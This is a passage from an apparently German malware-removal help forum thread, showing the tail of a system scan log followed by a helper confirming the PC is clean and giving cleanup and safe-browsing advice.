eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version:  - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version:  - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version:  - )
LightScribe  1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version:  - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version:  - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version:  - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version:  - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version:  - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)


==================== Restore Points  =========================

05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro
06-12-2014 17:21:14 Geplanter Prüfpunkt

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 11:23 - 2014-12-06 09:03 - 00000732 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1245B223-395D-46A5-93D1-C9AE1D55861B} - System32\Tasks\Registration 1und1 Task => C:\Program Files\1und1Softwareaktualisierung\cdsupdclient.exe [2014-03-31] (1&1 Mail & Media GmbH)
Task: {5E8F5D12-D836-4FA2-A55F-60B345663AEB} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Signature Update => c:\program files\windows defender\MpCmdRun.exe [2008-01-21] (Microsoft Corporation)
Task: {B2DE553E-4F93-444A-B89F-264EA7144119} - System32\Tasks\1und1 Konfiguration => C:\ProgramData\1und1InternetExplorerAddon\ConfigTask.exe [2011-03-16] (1und1 Mail und Media GmbH)
Task: {FCE905A1-631D-4DC4-B40B-06BCB2DE0B4A} - System32\Tasks\Microsoft\Windows\WindowsCalendar\Reminders - finja => C:\Program Files\Windows Calendar\WinCal.exe [2009-04-11] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Loaded Modules (whitelisted) =============

2009-02-27 10:19 - 2008-06-11 11:18 - 00024576 _____ () C:\Program Files\EMACHINES\eMachines Recovery Management\Service\ETService.exe
2009-02-27 10:19 - 2009-02-27 10:19 - 00032768 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.Controller\3.0.3009.0__14bcaafdb44b5951\Framework.Model.Controller.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00009216 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Model.ControllerInterface\3.0.3009.0__d842b71b4d6ed079\Framework.Model.ControllerInterface.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00061440 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Library\3.0.3009.0__3036420f80dd6947\Framework.Library.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00015360 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Host\3.0.3009.0__672b450de5a7e94a\Framework.Host.dll
2009-02-27 10:19 - 2009-02-27 10:19 - 00006144 _____ () C:\Windows\assembly\GAC_MSIL\Framework.PluginInterface\3.0.3009.0__9ecdf03bb2054f94\Framework.PluginInterface.dll
2009-02-27 10:20 - 2009-02-27 10:20 - 00036864 _____ () C:\Windows\assembly\GAC_MSIL\Framework.Utility\3.0.3009.0__4df5dcab8860d239\Framework.Utility.dll
2008-07-30 05:01 - 2003-06-07 06:30 - 00057344 _____ () C:\Program Files\Launch Manager\PowerUtl.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)


========================= Accounts: ==========================

Administrator (S-1-5-21-717213786-2690546565-922636609-500 - Administrator - Disabled)
finja (S-1-5-21-717213786-2690546565-922636609-1000 - Administrator - Enabled) => C:\Users\finja
Gast (S-1-5-21-717213786-2690546565-922636609-501 - Limited - Disabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (12/06/2014 08:57:13 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (12/06/2014 05:42:55 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003


System errors:
=============

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-12-06 22:37:19.011
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:37:18.465
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:37:17.950
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:37:17.358
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mbamchameleon.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:34:46.464
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:34:45.879
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:34:45.344
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 22:34:44.654
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 20:57:24.971
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2014-12-06 19:24:00.228
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\drivers\mwac.sys" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Memory info =========================== 

Processor: Pentium(R) Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 42%
Total physical RAM: 3001.08 MB
Available physical RAM: 1720.41 MB
Total Pagefile: 6232.44 MB
Available Pagefile: 4905.39 MB
Total Virtual: 2047.88 MB
Available Virtual: 1916.8 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:288.08 GB) (Free:233.98 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 93D3AC9B)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=288.1 GB) - (Type=07 NTFS)

==================== End Of Log ============================
         

06.12.2014, 22:41   #8
Machiavelli

How is the system running?
__________________
Proud member of Unite

06.12.2014, 22:45   #9
sbr_vfb

Unfortunately I can't compare it with a state in which the machine was not yet infected. But going by my current impression it definitely runs stably and also considerably faster... I would rate it as normal speed for the specs and the OS of this machine.

So it looks pretty good, I think, doesn't it?

06.12.2014, 22:48   #10
Machiavelli

Hello,
as far as I can tell, your PC is clean now.

The order is important here.
  1. If Defogger was used: start Defogger again and click re-enable.
  2. If Combofix was used: (alternatively rename it to uninstall.exe and start it)
    • Windows key + R > type Combofix /Uninstall > OK
    • Alternative: rename Combofix.exe to uninstall.exe and start it
    • Combofix will now start, possibly update itself, and then remove all remnants of itself.
  3. In any case, please download DelFix (Download DelFix) to your desktop:
    • Close all open programs.
    • Start delfix.exe with a double-click.
    • Put a tick in front of every function.
    • Click Start.
    • Note: DelFix removes, among other things, all the programs that were used, the quarantine of our scanners and the Java cache, and finally deletes itself.
    • Finally, restart your computer.
  4. Should any programs from our cleanup still be left over, you can delete them without hesitation.



If you want to give me feedback, you are welcome to do so here: Lob, Kritik und Wünsche - Trojaner-Board


I cannot stress often enough how important it is that your system is up to date.
  • Please check whether your system downloads Windows updates automatically
  • Windows Updates
    • Windows XP: Start --> Control Panel --> double-click Automatic Updates
    • Windows Vista / 7: Start --> Control Panel --> System and Security --> Turn automatic updating on or off
  • Make sure that automatic updates are enabled.
  • Software Updates
    Installed software can also have security holes that malware can use to infect your system.
    To keep your installed software up to date, I recommend Secunia Online Software.

Safe browsing
  • SpywareBlaster
    You can find a short introduction Here
  • MVPs hosts file
    You can find a tutorial here. Unfortunately I have not yet found a German-language one.
  • WOT (Web of Trust)
    This add-on warns you before you visit a site that has been reported as harmful.


Performance
Clean up your temp files regularly. I recommend TFC for this.
Stay away from any registry cleaners.
They do your system more harm than good. Here are a few (English) links:
Miekemoes Blogspot (MVP)
Bill Castner (MVP)


Don'ts
  • Don't click on everything just because it asks you to and looks nice and colourful.
  • Don't use peer-to-peer or file-sharing software (eMule, uTorrent, ...)
  • Keep your hands off cracks, keygens, serials or other illegal software.
  • Don't open attachments from e-mails you don't know the sender of. Pay particular attention to the file extension, e.g. yourPhoto.jpg.exe
Now all that remains is for me to wish you lots of fun surfing safely.

Note: Please give me a short reply once everything is done and there are no more questions, so that I can remove this thread from my subscriptions.
__________________
Proud member of Unite

06.12.2014, 22:59   #11
sbr_vfb

Well then, I would like to thank you very much for the extremely competent help! The system is clean again.

I will pass the advice on to my colleague, to spare all of us any future trouble.

On that note,
good night

06.12.2014, 23:05   #12
Machiavelli

No problem.
__________________
Proud member of Unite
